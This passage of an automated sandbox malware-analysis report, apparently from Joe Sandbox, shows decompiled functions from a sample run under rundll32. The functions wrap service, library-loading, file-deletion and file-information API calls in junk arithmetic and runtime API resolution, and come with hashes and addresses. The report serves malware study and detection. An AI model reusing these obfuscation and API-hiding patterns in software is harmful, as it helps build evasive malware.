0x001e477c
0x001e4788
0x001e4789
0x001e478e
0x001e4792
0x001e4799
0x001e47aa
0x001e47ad
0x001e47b4
0x001e47d3
0x001e47e4
0x001e47ea

APIs

SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 001E47E4

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction ID: b41913102c489bac4cb09d0a930d0090b65d8d85a06c79c1aee3bf2a3938a8e2
Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction Fuzzy Hash: 922100B2D01208FBEF05DFE5C84A8DEBBB5EF45354F108089E924A6290D3B59B10EF90

Uniqueness

Uniqueness Score: -1.00%

Function 001F340E, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E001F340E(void* __ecx, void* __edx, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t45;
				void* _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(0);
				_push(0);
				E001F2550(_t45);
				_v28 = 0x755cc3;
				_v24 = 0;
				_v20 = 0xc93f;
				_v20 = _v20 >> 3;
				_t59 = 0x1a;
				_v20 = _v20 / _t59;
				_v20 = _v20 ^ 0x00003660;
				_v16 = 0x16ad;
				_v16 = _v16 + 0x57a7;
				_v16 = _v16 | 0xbe0b763b;
				_v16 = _v16 ^ 0xbe0b2e9f;
				_v12 = 0xa207;
				_v12 = _v12 + 0xb6;
				_t60 = 0x37;
				_v12 = _v12 * 0x38;
				_v12 = _v12 ^ 0x0023dbd3;
				_v8 = 0xebb1;
				_v8 = _v8 / _t60;
				_v8 = _v8 | 0x19ad118e;
				_v8 = _v8 ^ 0x19ad0924;
				E001E7378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
				_t57 = OpenSCManagerW(0, 0, _a12); // executed
				return _t57;
			}

0x001f3415
0x001f341a
0x001f341b
0x001f341e
0x001f3423
0x001f342d
0x001f3432
0x001f3439
0x001f3442
0x001f3447
0x001f344c
0x001f3453
0x001f345a
0x001f3461
0x001f3468
0x001f346f
0x001f3476
0x001f3481
0x001f348d
0x001f3490
0x001f3497
0x001f34a8
0x001f34ab
0x001f34b2
0x001f34c6
0x001f34d3
0x001f34d9

APIs

OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 001F34D3

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
Instruction ID: beb66f61bf4d24ce130b7cb255ce01df02906cb5ede16b7cede1174697c307a1
Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
Instruction Fuzzy Hash: 852113B1D0131DABEB08DFA9C84A8EFBBB4FB10314F10818AE414AA280D3B55B148B90

Uniqueness

Uniqueness Score: -1.00%

Function 001F0321, Relevance: 1.6, APIs: 1, Instructions: 59
serviceCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E001F0321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				void* _t56;
				void* _t59;
				int _t60;

				_push(_a12);
				_t60 = __edx;
				_t59 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F2550(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xc39a9;
				_v20 = 0xd5ea;
				_v20 = _v20 | 0xff6e49b2;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0xfeddf181;
				_v12 = 0x5ebb;
				_v12 = _v12 * 0x36;
				_v12 = _v12 * 0x4e;
				_v12 = _v12 | 0x0415626f;
				_v12 = _v12 ^ 0x0617d8e0;
				_v16 = 0xb467;
				_v16 = _v16 << 4;
				_v16 = _v16 * 0x58;
				_v16 = _v16 ^ 0x03e03a17;
				_v8 = 0xc80e;
				_v8 = _v8 * 5;
				_v8 = _v8 * 0x5d;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x000b2851;
				E001E7378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
				return _t56;
			}

0x001f0329
0x001f032c
0x001f032e
0x001f0330
0x001f0333
0x001f0336
0x001f0337
0x001f0338
0x001f033d
0x001f0344
0x001f034b
0x001f0352
0x001f0359
0x001f035c
0x001f0363
0x001f037e
0x001f0386
0x001f0389
0x001f0390
0x001f0397
0x001f039e
0x001f03a6
0x001f03a9
0x001f03b0
0x001f03bb
0x001f03c2
0x001f03c5
0x001f03c9
0x001f03dc
0x001f03e9
0x001f03f0

APIs

OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 001F03E9

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
Instruction ID: 662047d6f408c4b93ffeffac2c3bde0170314059a19867761c65c5b8432f7605
Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
Instruction Fuzzy Hash: 2D21DFB1C0120DBBDB14DFA5C98A8DEBFB4FB45304F108199E825B6261D3B49B44DF91

Uniqueness

Uniqueness Score: -1.00%

Function 001F49CF, Relevance: 1.6, APIs: 1, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E001F49CF(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				struct HINSTANCE__* _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;

				_push(_a4);
				E001F2550(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2e62bd;
				_v12 = 0x9175;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 4;
				_t67 = 0x72;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x00007d95;
				_v20 = 0x6b8f;
				_v20 = _v20 + 0xab5d;
				_v20 = _v20 ^ 0x000118a2;
				_v16 = 0x74fd;
				_v16 = _v16 + 0xb2f4;
				_v16 = _v16 | 0x45835894;
				_v16 = _v16 ^ 0x45831718;
				_v8 = 0x475a;
				_t68 = 0x1a;
				_v8 = _v8 / _t68;
				_t69 = 0x71;
				_v8 = _v8 / _t69;
				_v8 = _v8 | 0x9a1a6af5;
				_v8 = _v8 ^ 0x9a1a601d;
				E001E7378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
				_t65 = LoadLibraryW(_a4); // executed
				return _t65;
			}

0x001f49d5
0x001f49da
0x001f49df
0x001f49e6
0x001f49ef
0x001f49f6
0x001f49fa
0x001f4a03
0x001f4a08
0x001f4a0d
0x001f4a14
0x001f4a1b
0x001f4a22
0x001f4a29
0x001f4a30
0x001f4a37
0x001f4a3e
0x001f4a45
0x001f4a4f
0x001f4a54
0x001f4a5c
0x001f4a64
0x001f4a67
0x001f4a6e
0x001f4a8d
0x001f4a98
0x001f4a9d

APIs

LoadLibraryW.KERNEL32(00007D95), ref: 001F4A98

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
Instruction ID: 2faef1bcc04fa8fcaec96bbcf4437c0f8c867934ebc4f9137f8405b035cd48c1
Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
Instruction Fuzzy Hash: C321F9B5E0020CFBEB04CFE5D94A5EEBBB1EB51304F10C099E518A7291D7B56B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 001F41CA, Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001F41CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t57;

				_t57 = __ecx;
				E001F2550(_t42);
				_v20 = 0x33dd;
				_t53 = 0x60;
				_v20 = _v20 / _t53;
				_v20 = _v20 ^ 0x0000445b;
				_v8 = 0x98b2;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x9f0dae98;
				_v8 = _v8 + 0xffff2dd8;
				_v8 = _v8 ^ 0x9f6f2800;
				_v16 = 0x7a4d;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x630ec107;
				_v16 = _v16 ^ 0x6301fd0c;
				_v12 = 0xd3a1;
				_v12 = _v12 ^ 0x9b5a4994;
				_v12 = _v12 + 0xffffbec0;
				_v12 = _v12 ^ 0x9b5a0da8;
				_t50 = E001E7378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
				return _t51;
			}

0x001f41d6
0x001f41e5
0x001f41ea
0x001f41fb
0x001f4203
0x001f4206
0x001f420d
0x001f4214
0x001f4218
0x001f421f
0x001f4226
0x001f422d
0x001f4234
0x001f4238
0x001f423f
0x001f4246
0x001f424d
0x001f4254
0x001f425b
0x001f427a
0x001f428a
0x001f4290

APIs

SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 001F428A

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
Instruction ID: 42041f5cba387f926585506c8f8b094b1029d41e8f9132c374cc450f7932e149
Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
Instruction Fuzzy Hash: 93114A72E00308BBEB04DFA4CC4AAAEBBB5EF44710F108088E924662A1D7B55B149F80

Uniqueness

Uniqueness Score: -1.00%

Function 001E5AB8, Relevance: 1.6, APIs: 1, Instructions: 51
serviceCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E001E5AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				int _t57;
				signed int _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001F2550(_t47);
				_v20 = 0xc8c;
				_v20 = _v20 + 0xffffaa04;
				_v20 = _v20 ^ 0xb702763d;
				_v20 = _v20 ^ 0x48fdd1a6;
				_v16 = 0xeb1c;
				_v16 = _v16 << 4;
				_t59 = 0xf;
				_v16 = _v16 * 0xe;
				_v16 = _v16 + 0xffff64c4;
				_v16 = _v16 ^ 0x00cd6bec;
				_v12 = 0x757;
				_v12 = _v12 ^ 0x4183b2e4;
				_v12 = _v12 << 2;
				_v12 = _v12 / _t59;
				_v12 = _v12 ^ 0x0067440e;
				_v8 = 0xa082;
				_v8 = _v8 >> 1;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xcec43627;
				_v8 = _v8 ^ 0xcec45939;
				E001E7378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
				_t57 = CloseServiceHandle(_a12); // executed
				return _t57;
			}

0x001e5abe
0x001e5ac1
0x001e5ac4
0x001e5ac9
0x001e5ace
0x001e5ad8
0x001e5ae1
0x001e5ae8
0x001e5aef
0x001e5af6
0x001e5b00
0x001e5b0b
0x001e5b0e
0x001e5b15
0x001e5b1c
0x001e5b23
0x001e5b2a
0x001e5b34
0x001e5b37
0x001e5b3e
0x001e5b45
0x001e5b48
0x001e5b4c
0x001e5b53
0x001e5b6c
0x001e5b77
0x001e5b7c

APIs

CloseServiceHandle.SECHOST(48FDD1A6), ref: 001E5B77

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
Instruction ID: 82b87440c0e53d9cf5cb49c3263f427cc1afc0a8474add5538e1731bde84e37c
Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
Instruction Fuzzy Hash: F9110371D0020DFFDB08DFA9C94A8EEBBB0FB40304F108599E525A6291D7B99B15DF40

Uniqueness

Uniqueness Score: -1.00%

Function 001EE554, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E001EE554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				int _t51;
				signed int _t53;
				struct _SHFILEOPSTRUCTW* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E001F2550(_t42);
				_v20 = 0xead4;
				_v20 = _v20 + 0xffff9be4;
				_v20 = _v20 ^ 0x000085bc;
				_v16 = 0x46f7;
				_v16 = _v16 << 0xe;
				_v16 = _v16 << 7;
				_t53 = 0x39;
				_v16 = _v16 / _t53;
				_v16 = _v16 ^ 0x03e8aab4;
				_v12 = 0x2beb;
				_v12 = _v12 ^ 0xafae01c3;
				_v12 = _v12 + 0xffff58eb;
				_v12 = _v12 ^ 0xa5118136;
				_v12 = _v12 ^ 0x0abc415f;
				_v8 = 0xa691;
				_v8 = _v8 ^ 0x7591c523;
				_v8 = _v8 << 0xa;
				_v8 = _v8 + 0x20df;
				_v8 = _v8 ^ 0x458ea297;
				E001E7378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
				_t51 = SHFileOperationW(_t57); // executed
				return _t51;
			}

0x001ee55b
0x001ee55e
0x001ee560
0x001ee562
0x001ee567
0x001ee571
0x001ee57a
0x001ee581
0x001ee588
0x001ee58c
0x001ee595
0x001ee59d
0x001ee5a0
0x001ee5a7
0x001ee5ae
0x001ee5b5
0x001ee5bc
0x001ee5c3
0x001ee5ca
0x001ee5d1
0x001ee5d8
0x001ee5dc
0x001ee5e3
0x001ee602
0x001ee60b
0x001ee611

APIs

SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 001EE60B

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
Instruction ID: 0da6fc75f323c70a684748dcaaf796d9c2c43cbe7404c8d046fb86fee8a2f350
Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
Instruction Fuzzy Hash: 2D11F3B1D01318BBEB58DFA5C84A8DEBBB4FB01718F108598E825B6251D3B95B44DB81

Uniqueness

Uniqueness Score: -1.00%

Function 001EEB1E, Relevance: 1.5, APIs: 1, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E001EEB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				int _t44;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F2550(_t34);
				_v8 = 0xd1b2;
				_v8 = _v8 * 0x63;
				_v8 = _v8 << 4;
				_v8 = _v8 * 0x74;
				_v8 = _v8 ^ 0x4bec8e88;
				_v20 = 0x1fc5;
				_v20 = _v20 + 0x9c84;
				_v20 = _v20 ^ 0x0000b099;
				_v16 = 0x542c;
				_v16 = _v16 | 0x3ba7d0a3;
				_v16 = _v16 ^ 0x3ba7e6ce;
				_v12 = 0x8319;
				_v12 = _v12 * 0x45;
				_v12 = _v12 + 0xffff39a4;
				_v12 = _v12 ^ 0x0022b84c;
				E001E7378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
				_t44 = DeleteFileW(_a8); // executed
				return _t44;
			}

0x001eeb24
0x001eeb27
0x001eeb2b
0x001eeb2c
0x001eeb31
0x001eeb49
0x001eeb4c
0x001eeb5b
0x001eeb5e
0x001eeb65
0x001eeb6c
0x001eeb73
0x001eeb7a
0x001eeb81
0x001eeb88
0x001eeb8f
0x001eeb9a
0x001eeb9d
0x001eeba4
0x001eebb7
0x001eebc2
0x001eebc7

APIs

DeleteFileW.KERNELBASE(3BA7E6CE), ref: 001EEBC2

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
Instruction ID: 622e04dafc670932015382cd3ca6ba7cfa03e8c5d4144041d6ae5062739bcf0a
Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
Instruction Fuzzy Hash: 1011E3B1C0020DFBDF04DFE4DA468AEBBB4FB80314F608589E914A62A1D7749B549F90

Uniqueness

Uniqueness Score: -1.00%

Function 001EF1ED, Relevance: 1.3, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001EF1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001F2550(_t46);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x28beb0;
				_v16 = 0xe97b;
				_v16 = _v16 >> 3;
				_t59 = 0x47;
				_v16 = _v16 / _t59;
				_v16 = _v16 ^ 0x00001a39;
				_v12 = 0x2d01;
				_v12 = _v12 >> 8;
				_t60 = 0x3a;
				_v12 = _v12 / _t60;
				_v12 = _v12 ^ 0x000023d3;
				_v20 = 0xc5d9;
				_v20 = _v20 | 0x3e7a6da8;
				_v20 = _v20 ^ 0x3e7ad9f3;
				_v8 = 0x3ddd;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xffffadd9;
				_v8 = _v8 ^ 0xffff8e91;
				E001E7378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
				_t57 = CloseHandle(_a12); // executed
				return _t57;
			}

0x001ef1f3
0x001ef1f6
0x001ef1f9
0x001ef1fe
0x001ef203
0x001ef20a
0x001ef213
0x001ef21a
0x001ef223
0x001ef228
0x001ef22d
0x001ef234
0x001ef23b
0x001ef242
0x001ef24a
0x001ef24d
0x001ef254
0x001ef25b
0x001ef262
0x001ef269
0x001ef270
0x001ef274
0x001ef27b
0x001ef29a
0x001ef2a5
0x001ef2aa

APIs

CloseHandle.KERNEL32(3E7AD9F3), ref: 001EF2A5

Memory Dump Source

Source File: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000C.00000002.2342418315.0000000000200000.00000040.00020000.sdmp Download File
Associated: 0000000C.00000002.2342423574.0000000000202000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
Instruction ID: 1bf22ed8c6ed6f14ec24ac39abadbdafe9c24ee9594c899bd47f638c777b79a4
Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
Instruction Fuzzy Hash: B41126B6D0020CEBDF05CFE5C80A9DEBBB5FB14308F108589EA14A6290D3B59B649F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00208330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00208361
GetSystemMetrics.USER32(00000000), ref: 0020839D
GetSystemMetrics.USER32(00000001), ref: 002083A8

Strings

/}Au, xrefs: 0020839D, 002083A8
GetMonitorInfo, xrefs: 00208348
DISPLAY, xrefs: 002083C9

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: fac2aaef895a0210a88bf318e7592c1949f346a89bd11b59779178feb7bb214f
Instruction ID: c513a26173b1de12a887e4ca6258bca9ffe32d12d19fc7d907216754a996ab1d
Opcode Fuzzy Hash: fac2aaef895a0210a88bf318e7592c1949f346a89bd11b59779178feb7bb214f
Instruction Fuzzy Hash: C011D6756117059FD720CF64AC487ABBBE8EB86B10F004569FD86D7282EBF0A8548B91

Uniqueness

Uniqueness Score: -1.00%

Function 002085AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 002085E5
GetSystemMetrics.USER32(00000000), ref: 0020860A
GetSystemMetrics.USER32(00000001), ref: 00208615

Strings

/}Au, xrefs: 0020860A, 00208615
EnumDisplayMonitors, xrefs: 002085C4

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: 1459cf9f26deedc9695d5205794c6982367944a7887dae5124c29cdef88709fc
Instruction ID: 441f6f191a6fbef9278a0ee021b27bc626e7e5cc2fb991b81197c01669ac39b6
Opcode Fuzzy Hash: 1459cf9f26deedc9695d5205794c6982367944a7887dae5124c29cdef88709fc
Instruction Fuzzy Hash: C1316BB2A1030AAFDB00DFA4DC44AEF77BCAB1A300F014526E951D3242EB75DA508BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00208404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00208471
GetSystemMetrics.USER32(00000001), ref: 0020847C

Strings

/}Au, xrefs: 00208471, 0020847C
GetMonitorInfoA, xrefs: 0020841C
DISPLAY, xrefs: 0020849D

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: f1479d1bc271c890545850771e453c789219dacd0e256376b259e85d092b8dd8
Instruction ID: 862e2a201592233a1b19a3f6bea23ae0b16735497e7b81ddcff49b2551fdb326
Opcode Fuzzy Hash: f1479d1bc271c890545850771e453c789219dacd0e256376b259e85d092b8dd8
Instruction Fuzzy Hash: 56110835A117069FD720CF60EC48BA7B7E9EF06720F004529ED95DB6C2DBB0A8548BA1

Uniqueness

Uniqueness Score: -1.00%

Function 002084D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00208545
GetSystemMetrics.USER32(00000001), ref: 00208550

Strings

/}Au, xrefs: 00208545, 00208550
GetMonitorInfoW, xrefs: 002084F0
DISPLAY, xrefs: 00208571

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: ba863b5831db62d6bdc32f7eb2500889fe59a2f8e5c8f930cb07d889d012b132
Instruction ID: e9597917e990adf83a343d6418987fc05415ff30f27938ee34787eacb522ee3d
Opcode Fuzzy Hash: ba863b5831db62d6bdc32f7eb2500889fe59a2f8e5c8f930cb07d889d012b132
Instruction Fuzzy Hash: CF113875A117059FD720CF609C48BA7BBE8EB07310F45452AED85D72C2DBB0A805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00208298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002082E6
GetSystemMetrics.USER32(00000001), ref: 002082F8

Strings

/}Au, xrefs: 002082E6, 002082F8
MonitorFromPoint, xrefs: 002082AA

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: 34e9bef25fb8e453d5579b543a84aa42e30e1050b43ea118d56066033efbc707
Instruction ID: 64f5d1cfcfd5af96c0dd62f7c6c13bbea1265f384803c3573e62e67a6a2be79a
Opcode Fuzzy Hash: 34e9bef25fb8e453d5579b543a84aa42e30e1050b43ea118d56066033efbc707
Instruction Fuzzy Hash: BC01D135A11309AFDB008F50EC4CB9F7B95EB82B54F044075F9858B293CBB0AC208FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00208170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002081C1
GetSystemMetrics.USER32(00000001), ref: 002081CD

Strings

/}Au, xrefs: 002081C1, 002081CD
MonitorFromRect, xrefs: 00208185

Memory Dump Source

Source File: 0000000C.00000002.2342428421.0000000000203000.00000020.00020000.sdmp, Offset: 00203000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_203000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
